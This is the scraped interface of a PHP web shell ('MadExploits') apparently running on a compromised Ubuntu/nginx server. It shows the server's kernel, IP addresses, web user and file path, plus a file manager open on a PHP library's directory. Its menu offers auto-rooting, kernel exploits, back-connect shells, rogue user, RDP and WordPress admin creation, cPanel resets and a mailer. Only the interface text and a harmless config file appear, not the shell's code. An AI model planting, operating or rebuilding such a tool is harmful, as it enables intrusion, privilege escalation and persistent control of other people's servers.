Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
lms-api /
vendor /
mockery /
mockery /
[ HOME SHELL ]
Name
Size
Permission
Action
docs
[ DIR ]
drwxrwxr-x
library
[ DIR ]
drwxrwxr-x
.phpstorm.meta.php
350
B
-rw-rw-r--
.readthedocs.yml
626
B
-rw-rw-r--
CHANGELOG.md
21.39
KB
-rw-rw-r--
CONTRIBUTING.md
3.18
KB
-rw-rw-r--
COPYRIGHT.md
952
B
-rw-rw-r--
LICENSE
1.52
KB
-rw-rw-r--
README.md
10.33
KB
-rw-rw-r--
SECURITY.md
408
B
-rw-rw-r--
composer.json
3.69
KB
-rw-rw-r--
composer.lock
65.82
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .readthedocs.yml
# Read the Docs configuration file for Sphinx projects # See https://docs.readthedocs.io/en/stable/config-file/v2.html for details # Required version: 2 # Set the OS, Python version and other tools we might need build: os: ubuntu-22.04 tools: python: "3.12" # Build documentation in the "docs/" directory with Sphinx sphinx: configuration: docs/conf.py # Build documentation in additional formats such as PDF and ePub formats: all # Build requirements for our documentation # See https://docs.readthedocs.io/en/stable/guides/reproducible-builds.html python: install: - requirements: docs/requirements.txt
Close